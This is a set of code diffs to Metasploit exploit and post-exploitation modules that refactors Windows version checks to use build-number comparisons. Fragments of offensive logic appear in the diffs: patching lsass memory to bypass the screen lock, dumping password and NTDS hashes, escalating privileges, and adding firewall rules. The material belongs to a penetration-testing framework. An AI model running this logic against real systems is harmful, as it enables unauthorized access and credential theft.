-            'timwr' # msf module
-          ],
-          'Platform' => 'win',
-          'SessionTypes' => ['meterpreter'],
-          'Targets' => [
-            ['Windows 7 x86', { 'Arch' => ARCH_X86 }]
-          ],
-          'Notes' => {
-            'Stability' => [CRASH_OS_RESTARTS],
-            'SideEffects' => [SCREEN_EFFECTS],
-            'Reliability' => [REPEATABLE_SESSION]
-          },
-          'References' => [
-            ['CVE', '2019-0808'],
-            ['URL', 'https://github.com/exodusintel/CVE-2019-0808'],
-            ['URL', 'https://github.com/ze0r/cve-2019-0808-poc'],
-            ['URL', 'http://blogs.360.cn/post/RootCause_CVE-2019-0808_EN.html'],
-            ['URL', 'https://blog.exodusintel.com/2019/05/17/windows-within-windows/'],
-          ],
-          'DisclosureDate' => '2019-03-12',
-          'DefaultTarget' => 0
-        )
+          This module has been tested against Windows 7 x86 SP0 and SP1. Offsets
+          within the solution may need to be adjusted to work with other versions
+          of Windows, such as Windows Server 2008.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Clément Lecigne', # discovery
+          'Grant Willcox', # exploit
+          'timwr' # msf module
+        ],
+        'Platform' => 'win',
+        'SessionTypes' => ['meterpreter'],
+        'Targets' => [
+          ['Windows 7 x86', { 'Arch' => ARCH_X86 }]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_OS_RESTARTS],
+          'SideEffects' => [SCREEN_EFFECTS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'References' => [
+          ['CVE', '2019-0808'],
+          ['URL', 'https://github.com/exodusintel/CVE-2019-0808'],
+          ['URL', 'https://github.com/ze0r/cve-2019-0808-poc'],
+          ['URL', 'http://blogs.360.cn/post/RootCause_CVE-2019-0808_EN.html'],
+          ['URL', 'https://blog.exodusintel.com/2019/05/17/windows-within-windows/'],
+        ],
+        'DisclosureDate' => '2019-03-12',
+        'DefaultTarget' => 0
+      )
     )
   end
 

--- a/modules/exploits/windows/local/ntusermndragover.rb
+++ b/modules/exploits/windows/local/ntusermndragover.rb
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     version = get_version_info
 
-    vprint_status("Windows Build Number = #{version._build}")
+    vprint_status("OS version: #{version}")
     # see https://docs.microsoft.com/en-us/windows/release-information/
     unless version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win7_SP1) && version.workstation?
       print_error('The exploit only supports Windows 7 versions 7600 and 7601')

--- a/modules/exploits/windows/local/ntusermndragover.rb
+++ b/modules/exploits/windows/local/ntusermndragover.rb
@@ -62,17 +62,16 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    sysinfo_value = sysinfo['OS']
-
-    if sysinfo_value !~ /windows/i
+    if session.platform != 'windows'
       # Non-Windows systems are definitely not affected.
       return CheckCode::Safe
     end
 
-    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
-    vprint_status("Windows Build Number = #{build_num}")
+    version = get_version_info
+
+    vprint_status("Windows Build Number = #{version._build}")
     # see https://docs.microsoft.com/en-us/windows/release-information/
-    unless sysinfo_value =~ /7/ && (build_num >= 7600 && build_num <= 7601)
+    unless version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win7_SP1) && version.workstation?
       print_error('The exploit only supports Windows 7 versions 7600 and 7601')
       return CheckCode::Safe
     end

--- a/modules/exploits/windows/local/nvidia_nvsvc.rb
+++ b/modules/exploits/windows/local/nvidia_nvsvc.rb
@@ -72,8 +72,7 @@ class MetasploitModule < Msf::Exploit::Local
       '3341d2c91989bc87c3c0baa97c27253b'
     ]
 
-    os = sysinfo["OS"]
-    if os =~ /windows/i
+    if session.platform == 'windows'
       svc = service_info 'nvsvc'
       if svc and svc[:display] =~ /NVIDIA/i
         vprint_good("Found service '#{svc[:display]}'")

--- a/modules/exploits/windows/local/panda_psevents.rb
+++ b/modules/exploits/windows/local/panda_psevents.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Exploit::EXE
   include Exploit::FileDropper
   include Post::File
+  include Msf::Post::Windows::Version
 
   def initialize(info={})
     super( update_info( info,
@@ -58,10 +59,10 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def get_path()
-    case sysinfo['OS']
-    when /Windows (NT|XP)/
+    version = get_version_info
+    if version.build_number < Msf::WindowsVersion::Vista_SP0
       return '%AllUsersProfile%\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171'
-    else #/Windows (7|8|10|2012|2008)/ we assume a modern operating system
+    else # AllUsers directory changed as of Vista
       return '%ProgramData%\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171'
     end
   end
@@ -77,7 +78,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    vprint_status("OS Detected as: #{sysinfo['OS']}")
+    version = get_version_info
+    vprint_status("OS Detected as: #{version.product_name}")
 
     payload_filepath = get_path()
     payload_filepath = "#{payload_filepath}\\#{datastore['DLL']}"

--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -70,8 +70,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    os = sysinfo["OS"]
-    if os =~ /windows/i
+    if session.platform == 'windows'
       file_path = session.sys.config.getenv('windir') << "\\system32\\win32k.sys"
       major, minor, build, revision, branch = file_version(file_path)
       vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision}")

--- a/modules/exploits/windows/local/s4u_persistence.rb
+++ b/modules/exploits/windows/local/s4u_persistence.rb
@@ -69,7 +69,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    if not (sysinfo['OS'] =~ /Windows (Vista|7|8|2008|2012|2016|2019|2022|10)/ )
+    version = get_version_info
+    unless version.build_number >= Msf::WindowsVersion::Vista_SP0
       fail_with(Failure::NoTarget, "This module only works on Vista/2008 and above")
     end
 

--- a/modules/exploits/windows/local/srclient_dll_hijacking.rb
+++ b/modules/exploits/windows/local/srclient_dll_hijacking.rb
@@ -50,7 +50,8 @@ class MetasploitModule < Msf::Exploit::Local
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [ CRASH_SAFE, ],
-          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS ]
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS ],
+          'Reliability' => []
         },
         'Compat' => {
           'Meterpreter' => {
@@ -230,16 +231,12 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    # check OS
-    unless sysinfo['OS'].include?('2012')
+    version = get_version_info
+    unless version.build_number == Msf::WindowsVersion::Server2012 && version.windows_server?
       return Exploit::CheckCode::Safe('Target is not Windows Server 2012.')
     end
 
-    if sysinfo['OS'].include?('R2')
-      return Exploit::CheckCode::Safe('Target is Windows Server 2012 R2, but only Windows Server 2012 is vulnerable.')
-    end
-
-    print_status("Target is #{sysinfo['OS']}")
+    print_status("Target is #{version.product_name}")
 
     # obtain the Windows Update setting to see if exploitation could work at all
     @wupdate_setting = registry_getvaldata('HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Auto Update', 'AUOptions')

--- a/modules/exploits/windows/local/tokenmagic.rb
+++ b/modules/exploits/windows/local/tokenmagic.rb
@@ -105,22 +105,10 @@ minutes to trigger', 'SERVICE', ['SERVICE', 'DLL']
   def exploit
     win_dir = session.sys.config.getenv('windir')
     cmd_path = "#{win_dir}\\system32\\cmd.exe"
-    if datastore['SERVICE_FILENAME']
-      service_filename = datastore['SERVICE_FILENAME']
-    else
-      service_filename = Rex::Text.rand_text_alpha(5..9)
-    end
+    service_filename = datastore['SERVICE_FILENAME'] || Rex::Text.rand_text_alpha(5..9)
     service_filename = "#{service_filename}.exe" unless service_filename.end_with?('.exe')
-    if datastore['SERVICE_NAME']
-      service_name = datastore['SERVICE_NAME']
-    else
-      service_name = Rex::Text.rand_text_alpha(5..9)
-    end
-    if datastore['WRITABLE_DIR']
-      writable_dir = datastore['WRITABLE_DIR']
-    else
-      writable_dir = session.sys.config.getenv('TEMP')
-    end
+    service_name = datastore['SERVICE_NAME'] || Rex::Text.rand_text_alpha(5..9)
+    writable_dir = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP')
 
     # Check target
     validate_active_host

--- a/modules/exploits/windows/local/tokenmagic.rb
+++ b/modules/exploits/windows/local/tokenmagic.rb
@@ -187,23 +187,17 @@ minutes to trigger and recieve a shell.")
   end
 
   def check
-    sysinfo_value = sysinfo['OS']
-    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)
-    if build_num.nil?
-      return CheckCode::Unknown("Couldn't retrieve the target's build number!")
-    else
-      vprint_status("Target's build number: #{build_num}")
-      build_num = build_num[0].to_i
-    end
+    version = get_version_info
 
-    vprint_status("Build Number = #{build_num}")
+    vprint_status("OS: #{version.product_name}")
+    # Service method has been tested on Windows 7, 8 and 10 (1803 and ealier)
+    vulnerable_to_service = version.build_number.between?(Msf::WindowsVersion::Win7_SP1, Msf::WindowsVersion::Win10_1803)
     if datastore['METHOD'] =~ /service/i
-      # Service method has been tested on Windows 7, 8 and 10 (1803 and ealier)
-      return Exploit::CheckCode::Appears if (build_num >= 7601 && build_num <= 17134)
-    elsif (sysinfo_value =~ /10/ && build_num >= 15063 && build_num <= 17134)
+      return Exploit::CheckCode::Appears if vulnerable_to_service
+    elsif version.build_number.between?(Msf::WindowsVersion::Win10_1703, Msf::WindowsVersion::Win10_1803)
       # DLL method has been tested on Windows 10 (1703 to 1803)
       return Exploit::CheckCode::Appears
-    elsif (datastore['METHOD'] =~ /dll/i && build_num >= 7601 && build_num < 15063)
+    elsif datastore['METHOD'] =~ /dll/i && vulnerable_to_service
       print_error("The current target is not vulnerable to the DLL hijacking technique. Please try setting METHOD to 'SERVICE' and then try again!")
     end
     Exploit::CheckCode::Safe

--- a/modules/exploits/windows/local/virtual_box_guest_additions.rb
+++ b/modules/exploits/windows/local/virtual_box_guest_additions.rb
@@ -102,8 +102,8 @@ class MetasploitModule < Msf::Exploit::Local
 
     session.railgun.kernel32.CloseHandle(handle)
 
-    os = sysinfo["OS"]
-    unless (os =~ /windows xp.*service pack 3/i)
+    version = get_version_info
+    if version != Msf::WindowsVersion::XP_SP3
       return Exploit::CheckCode::Safe
     end
 

--- a/modules/post/multi/gather/apple_ios_backup.rb
+++ b/modules/post/multi/gather/apple_ios_backup.rb
@@ -5,6 +5,7 @@
 
 class MetasploitModule < Msf::Post
   include Msf::Post::File
+  include Msf::Post::Windows::Version
 
   def initialize(info = {})
     super(
@@ -28,7 +29,6 @@ class MetasploitModule < Msf::Post
               core_channel_write
               stdapi_sys_config_getenv
               stdapi_sys_config_getuid
-              stdapi_sys_config_sysinfo
             ]
           }
         }
@@ -56,9 +56,9 @@ class MetasploitModule < Msf::Post
     when 'windows'
       @platform = :windows
       drive = session.sys.config.getenv('SystemDrive')
-      os = session.sys.config.sysinfo['OS']
+      version = get_version_info
 
-      if os =~ /Windows 7|Vista|2008/
+      if version.build_number >= Msf::WindowsVersion::Vista_SP0
         @appdata = '\\AppData\\Roaming'
         @users = drive + '\\Users'
       else

--- a/modules/post/multi/gather/firefox_creds.rb
+++ b/modules/post/multi/gather/firefox_creds.rb
@@ -64,7 +64,6 @@ class MetasploitModule < Msf::Post
               stdapi_fs_stat
               stdapi_sys_config_getenv
               stdapi_sys_config_getuid
-              stdapi_sys_config_sysinfo
               stdapi_sys_process_get_processes
               stdapi_sys_process_kill
             ]
@@ -380,7 +379,8 @@ class MetasploitModule < Msf::Post
 
     case @platform
     when :windows
-      unless got_root || session.sys.config.sysinfo['OS'] =~ /xp/i
+      version = get_version_info
+      unless got_root || version.xp_or_2003?
         print_warning("You may need SYSTEM privileges on this platform for the DECRYPT option to work")
       end
 

--- a/modules/post/windows/escalate/screen_unlock.rb
+++ b/modules/post/windows/escalate/screen_unlock.rb
@@ -6,6 +6,7 @@
 require 'metasm'
 
 class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Version
 
   def initialize(info = {})
     super(
@@ -29,7 +30,6 @@ class MetasploitModule < Msf::Post
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
-              stdapi_sys_config_sysinfo
               stdapi_sys_process_attach
               stdapi_sys_process_memory_read
               stdapi_sys_process_memory_write
@@ -53,22 +53,22 @@ class MetasploitModule < Msf::Post
     revert = datastore['REVERT']
 
     targets = [
-      { :sig => "8bff558bec83ec50a1", :sigoffset => 0x9927, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x99cc, :os => /Windows XP.*Service Pack 2/ },
-      { :sig => "8bff558bec83ec50a1", :sigoffset => 0x981b, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x98c0, :os => /Windows XP.*Service Pack 3/ },
-      { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb76a, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb827, :os => /Windows Vista/ },
-      { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb391, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb44e, :os => /Windows Vista/ },
-      { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xacf6, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xadb3, :os => /Windows Vista/ },
-      { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ },
-      { :sig => "8bff558bec83ec50a1", :sigoffset => 0x97d3, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x9878, :os => /Windows XP.*Service Pack 3 - spanish/ }
+      { :sig => "8bff558bec83ec50a1", :sigoffset => 0x9927, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x99cc, :os_start => Msf::WindowsVersion::XP_SP2, :os_end => Msf::WindowsVersion::XP_SP2 },
+      { :sig => "8bff558bec83ec50a1", :sigoffset => 0x981b, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x98c0, :os_start => Msf::WindowsVersion::XP_SP3, :os_end => Msf::WindowsVersion::XP_SP3 },
+      { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb76a, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb827, :os_start => Msf::WindowsVersion::Vista_SP0, :os_end => Msf::WindowsVersion::Vista_SP2 },
+      { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb391, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb44e, :os_start => Msf::WindowsVersion::Vista_SP0, :os_end => Msf::WindowsVersion::Vista_SP2 },
+      { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xacf6, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xadb3, :os_start => Msf::WindowsVersion::Vista_SP0, :os_end => Msf::WindowsVersion::Vista_SP2 },
+      { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os_start => Msf::WindowsVersion::Win7_SP0, :os_end => Msf::WindowsVersion::Win7_SP1 },
+      { :sig => "8bff558bec83ec50a1", :sigoffset => 0x97d3, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x9878, :os_start => Msf::WindowsVersion::XP_SP3, :os_end => Msf::WindowsVersion::XP_SP3 } # Spanish
     ]
 
     unsupported if client.platform != 'windows' || (client.arch != ARCH_X64 && client.arch != ARCH_X86)
-    os = client.sys.config.sysinfo['OS']
+    version = get_version_info
 
     targets.each do |t|
-      if os =~ t[:os]
+      if version.build_number.between?(t[:os_start], t[:os_end]) && !version.windows_server?
         target = t
-        print_status("OS '#{os}' found in known targets")
+        print_status("OS '#{version.product_name}' found in known targets")
         pid = client.sys.process["lsass.exe"]
         p = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
         dllbase = p.image["msv1_0.dll"]

--- a/modules/post/windows/escalate/unmarshal_cmd_exec.rb
+++ b/modules/post/windows/escalate/unmarshal_cmd_exec.rb
@@ -5,6 +5,7 @@
 class MetasploitModule < Msf::Post
   include Msf::Post::Common
   include Msf::Post::File
+  include Msf::Post::Windows::Version
   #  include Msf::Post::Windows::Priv
 
   def initialize(info = {})
@@ -97,8 +98,9 @@ class MetasploitModule < Msf::Post
     if sysinfo['Architecture'] == ARCH_X86
       fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
     end
-    if sysinfo['OS'] =~ /XP/
-      fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
+    version = get_version_info
+    unless version.build_number.between?(Msf::WindowsVersion::Vista_SP0, Msf::WindowsVersion::Win10_1803)
+      fail_with(Failure::Unknown, 'The exploit does not support this OS')
     end
   end
 

--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -89,18 +89,18 @@ class MetasploitModule < Msf::Post
   end
 
   def copy_database_file
-    database_file_path = nil
-    case sysinfo["OS"]
-    when /2003| \.NET/
-      print_status "Using Volume Shadow Copy Method"
-      database_file_path = vss_method
-    when /2008|2012|2016/
-      print_status "Using NTDSUTIL method"
-      database_file_path = ntdsutil_method
-    else
-      print_error "This version of Windows is unsupported"
+    version = get_version_info
+    if version.windows_server?
+      if version.build_number.between?(Msf::WindowsVersion::Server2003_SP0, Msf::WindowsVersion::Server2003_SP2)
+        print_status "Using Volume Shadow Copy Method"
+        return vss_method
+      elsif version.build_number >= Msf::WindowsVersion::Server2008_SP0
+        print_status "Using NTDSUTIL method"
+        return ntdsutil_method
+      end
     end
-    database_file_path
+    print_error "This version of Windows is unsupported"
+    return nil
   end
 
   def ntds_exists?

--- a/modules/post/windows/gather/dumplinks.rb
+++ b/modules/post/windows/gather/dumplinks.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Post
   # Run Method for when run command is issued
   def run
     print_status("Running module against #{sysinfo['Computer']}")
-    enum_users(sysinfo['OS']).each do |user|
+    enum_users().each do |user|
       if user['userpath']
         print_status "Extracting lnk files for user #{user['username']} at #{user['userpath']}..."
         extract_lnk_info(user['userpath'])
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Post
     end
   end
 
-  def enum_users(os)
+  def enum_users()
     users = []
     userinfo = {}
     user = session.sys.config.getuid
@@ -68,7 +68,8 @@ class MetasploitModule < Msf::Post
     useroffcpath = nil
     env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
     sysdrv = env_vars['SystemDrive']
-    if os =~ /Windows 7|Vista|2008/
+    version = get_version_info
+    if version.build_number >= Msf::WindowsVersion::Vista_SP0
       userpath = sysdrv + "\\Users\\"
       lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
       officelnkpath = "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\"

--- a/modules/post/windows/gather/enum_files.rb
+++ b/modules/post/windows/gather/enum_files.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::FileSystem
+  include Msf::Post::Windows::Version
   include Msf::Auxiliary::Report
 
   def initialize(info = {})
@@ -29,7 +30,6 @@ class MetasploitModule < Msf::Post
               stdapi_fs_search
               stdapi_railgun_api
               stdapi_sys_config_getenv
-              stdapi_sys_config_sysinfo
             ]
           }
         }
@@ -46,15 +46,15 @@ class MetasploitModule < Msf::Post
 
   def download_files(location, file_type)
     sysdriv = client.sys.config.getenv('SYSTEMDRIVE')
-    sysnfo = client.sys.config.sysinfo['OS']
     profile_path_old = sysdriv + "\\Documents and Settings\\"
     profile_path_new = sysdriv + "\\Users\\"
 
+    version = get_version_info
     if location
       print_status("Searching #{location}")
       getfile = client.fs.file.search(location, file_type, recurse = true, timeout = -1)
 
-    elsif sysnfo =~ /(Windows XP|2003|.NET)/
+    elsif version.build_number < Msf::WindowsVersion::Vista_SP0
       print_status("Searching #{profile_path_old} through windows user profile structure")
       getfile = client.fs.file.search(profile_path_old, file_type, recurse = true, timeout = -1)
     else

--- a/modules/post/windows/gather/enum_muicache.rb
+++ b/modules/post/windows/gather/enum_muicache.rb
@@ -222,14 +222,14 @@ class MetasploitModule < Msf::Post
   # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots
   def run
     print_status("Starting to enumerate MUICache registry keys...")
-    sys_info = sysinfo['OS']
+    version = get_version_info
 
-    if sys_info =~ /Windows XP/ && is_admin?
-      print_good("Remote system supported: #{sys_info}")
+    if version.xp_or_2003? && is_admin?
+      print_good("Remote system supported: #{version.product_name}")
       muicache = "\\Software\\Microsoft\\Windows\\ShellNoRoam\\MUICache"
       hive_file = "\\NTUSER.DAT"
-    elsif sys_info =~ /Windows 7/ && is_admin?
-      print_good("Remote system supported: #{sys_info}")
+    elsif version.build_number >= Msf::WindowsVersion::Vista_SP0 && is_admin?
+      print_good("Remote system supported: #{version.product_name}")
       muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MUICache"
       hive_file = "\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat"
     else

--- a/modules/post/windows/gather/enum_prefetch.rb
+++ b/modules/post/windows/gather/enum_prefetch.rb
@@ -28,7 +28,6 @@ class MetasploitModule < Msf::Post
             'Commands' => %w[
               stdapi_fs_search
               stdapi_sys_config_getenv
-              stdapi_sys_config_sysinfo
             ]
           }
         }
@@ -139,10 +138,10 @@ class MetasploitModule < Msf::Post
     # http://www.forensicswiki.org/wiki/Prefetch
     # http://www.forensicswiki.org/wiki/Windows_Prefetch_File_Format
 
-    sysnfo = client.sys.config.sysinfo['OS']
     error_msg = "You don't have enough privileges. Try getsystem."
 
-    if sysnfo =~ /(Windows XP|2003|.NET)/
+    version = get_version_info
+    if version.xp_or_2003?
 
       if not is_admin?
         print_error(error_msg)
@@ -150,7 +149,7 @@ class MetasploitModule < Msf::Post
       end
 
       # Offsets for WinXP & Win2k3
-      print_good("Detected #{sysnfo} (max 128 entries)")
+      print_good("Detected #{version.product_name} (max 128 entries)")
       name_offset = 0x10
       hash_offset = 0x4C
       runcount_offset = 0x90
@@ -158,14 +157,14 @@ class MetasploitModule < Msf::Post
       # Registry key for timezone
       key_value = "StandardName"
 
-    elsif sysnfo =~ /(Windows 7)/
+    elsif version.win7_or_2008r2? && !version.windows_server?
       if not is_admin?
         print_error(error_msg)
         return nil
       end
 
       # Offsets for Win7
-      print_good("Detected #{sysnfo} (max 128 entries)")
+      print_good("Detected #{version.product_name} (max 128 entries)")
       name_offset = 0x10
       hash_offset = 0x4C
       runcount_offset = 0x98

--- a/modules/post/windows/gather/file_from_raw_ntfs.rb
+++ b/modules/post/windows/gather/file_from_raw_ntfs.rb
@@ -44,9 +44,9 @@ class MetasploitModule < Msf::Post
   end
 
   def run
-    winver = sysinfo["OS"]
+    version = get_version_info
 
-    fail_with(Failure::NoTarget, 'Module not valid for Windows 2000') if winver =~ /2000/
+    fail_with(Failure::NoTarget, 'Module not valid for Windows 2000') if version.build_number == Msf::WindowsVersion::Win2000
     fail_with(Failure::NoAccess, 'You don\'t have administrative privileges') unless is_admin?
 
     file_path = datastore['FILE_PATH']

--- a/modules/post/windows/gather/forensics/recovery_files.rb
+++ b/modules/post/windows/gather/forensics/recovery_files.rb
@@ -46,9 +46,8 @@ class MetasploitModule < Msf::Post
   end
 
   def run
-    winver = sysinfo["OS"]
-
-    if winver =~ /2000/i
+    version = get_version_info
+    if version.build_number == Msf::WindowsVersion::Win2000
       print_error("Module not valid for Windows 2000")
       return
     end
@@ -66,7 +65,7 @@ class MetasploitModule < Msf::Post
       return
     end
 
-    print_status("System Info - OS: #{winver}, Drive: #{drive}")
+    print_status("System Info - OS: #{version.product_name}, Drive: #{drive}")
     type = datastore['FILES']
     files = type.split(',')
     # To extract files from its IDs

--- a/modules/post/windows/gather/local_admin_search_enum.rb
+++ b/modules/post/windows/gather/local_admin_search_enum.rb
@@ -76,7 +76,8 @@ class MetasploitModule < Msf::Post
         # Uses DC which applied policy since it would be a DC this device normally talks to
         cmd = "gpresult /SCOPE COMPUTER"
         # If Vista/2008 or later add /R
-        if (sysinfo['OS'] =~ /Build [6-9]\d\d\d/)
+        version = get_version_info
+        if version.build_number >= Msf::WindowsVersion::Vista_SP0
           cmd << " /R"
         end
         res = cmd_exec("cmd.exe", "/c #{cmd}")

--- a/modules/post/windows/gather/smart_hashdump.rb
+++ b/modules/post/windows/gather/smart_hashdump.rb
@@ -417,6 +417,7 @@ class MetasploitModule < Msf::Post
 
     if !is_uac_enabled? || is_admin?
       print_status('Dumping password hashes...')
+      version = get_version_info
       # Check if Running as SYSTEM
       if is_system?
         # For DC's the registry read method does not work.
@@ -426,7 +427,7 @@ class MetasploitModule < Msf::Post
           rescue ::Exception => e
             print_error('Failed to dump hashes as SYSTEM, trying to migrate to another process')
 
-            if sysinfo['OS'] =~ /Windows (2008|2012)/i
+            if version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Server2012_R2) && version.is_windows_server
               move_to_sys
               file_local_write(pwdfile, inject_hashdump)
             else
@@ -453,7 +454,7 @@ class MetasploitModule < Msf::Post
               results = session.priv.getsystem
               if results[0]
                 print_good('Got SYSTEM privilege')
-                if session.sys.config.sysinfo['OS'] =~ /Windows (2008|2012)/i
+                if version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Server2012_R2) && version.is_windows_server
                   # Migrate process since on Windows 2008 R2 getsystem
                   # does not set certain privilege tokens required to
                   # inject and dump the hashes.
@@ -467,7 +468,7 @@ class MetasploitModule < Msf::Post
               print_error('Could not get NTDS hashes!')
             end
           end
-        elsif sysinfo['OS'] =~ /Windows (7|8|2008|2012|Vista)/i
+        elsif version.build_number.between?(Msf::WindowsVersion::Vista_SP0, Msf::WindowsVersion::Win81)
           if migrate_system
             print_status('Trying to get SYSTEM privilege')
             results = session.priv.getsystem

--- a/modules/post/windows/gather/smart_hashdump.rb
+++ b/modules/post/windows/gather/smart_hashdump.rb
@@ -427,7 +427,7 @@ class MetasploitModule < Msf::Post
           rescue ::Exception => e
             print_error('Failed to dump hashes as SYSTEM, trying to migrate to another process')
 
-            if version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Server2012_R2) && version.is_windows_server
+            if version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Server2012_R2) && version.windows_server?
               move_to_sys
               file_local_write(pwdfile, inject_hashdump)
             else
@@ -454,7 +454,7 @@ class MetasploitModule < Msf::Post
               results = session.priv.getsystem
               if results[0]
                 print_good('Got SYSTEM privilege')
-                if version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Server2012_R2) && version.is_windows_server
+                if version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Server2012_R2) && version.windows_server?
                   # Migrate process since on Windows 2008 R2 getsystem
                   # does not set certain privilege tokens required to
                   # inject and dump the hashes.

--- a/modules/post/windows/manage/enable_support_account.rb
+++ b/modules/post/windows/manage/enable_support_account.rb
@@ -62,13 +62,13 @@ class MetasploitModule < Msf::Post
       end
     end
 
-    wver = sysinfo()["OS"]
-    if wver !~ /Windows XP|Windows .NET|Windows 2003/
-      print_error("#{wver} is not supported")
+    version = get_version_info
+    unless version.build_number.between?(Msf::WindowsVersion::XP_SP0, Msf::WindowsVersion::Server2003_SP2)
+      print_error("#{version.product_name} is not supported")
       return
     end
 
-    print_status("Target OS is #{wver}")
+    print_status("Target OS is #{version.product_name}")
     names_key = registry_enumkeys(reg_key + '\\Names')
     unless names_key
       print_error("Couldn't access registry keys")

--- a/modules/post/windows/manage/portproxy.rb
+++ b/modules/post/windows/manage/portproxy.rb
@@ -39,7 +39,8 @@ class MetasploitModule < Msf::Post
 
     # Due to a bug in Windows XP you need to install IPv6
     # http://support.microsoft.com/kb/555744/en-us
-    if sysinfo["OS"] =~ /XP/
+    version = get_version_info
+    if version.build_number.between?(Msf::WindowsVersion::XP_SP0, Msf::WindowsVersion::XP_SP2)
       return unless check_ipv6
     end
 
@@ -109,7 +110,8 @@ class MetasploitModule < Msf::Post
 
   def fw_enable_ports
     print_status("Setting port #{datastore['LOCAL_PORT']} in Windows Firewall ...")
-    if sysinfo["OS"] =~ /Windows 7|Vista|2008|2012/
+    version = get_version_info
+    if version.build_number >= Msf::WindowsVersion::Vista_SP0
       cmd_exec("netsh","advfirewall firewall add rule name=\"Windows Service\" dir=in protocol=TCP action=allow localport=\"#{datastore['LOCAL_PORT']}\"")
     else
       cmd_exec("netsh","firewall set portopening protocol=TCP port=\"#{datastore['LOCAL_PORT']}\"")

--- a/modules/post/windows/manage/pptp_tunnel.rb
+++ b/modules/post/windows/manage/pptp_tunnel.rb
@@ -40,7 +40,8 @@ class MetasploitModule < Msf::Post
 
 
   def run
-    disable_network_wizard if sysinfo["OS"] =~ /Windows 7|Vista|2008/
+    version = get_version_info
+    disable_network_wizard if version.build_number.between?(Msf::WindowsVersion::Vista_SP0, Msf::WindowsVersion::Win7_SP1)
 
     pbk = create_pbk(datastore['MITM'],datastore['PBK_NAME'])
     to = (datastore['TIMEOUT'] <= 0 ) ? 60 : datastore['TIMEOUT']

--- a/modules/post/windows/manage/rid_hijack.rb
+++ b/modules/post/windows/manage/rid_hijack.rb
@@ -122,8 +122,8 @@ class MetasploitModule < Msf::Post
     end
 
     # Checks the Windows Version.
-    wver = sysinfo["OS"]
-    print_status("Target OS: #{wver}")
+    version = get_version_info
+    print_status("Target OS: #{version.product_name}")
 
     # Load the usernames from SAM Registry key
     names_key = registry_enumkeys(reg_key + '\\Names')

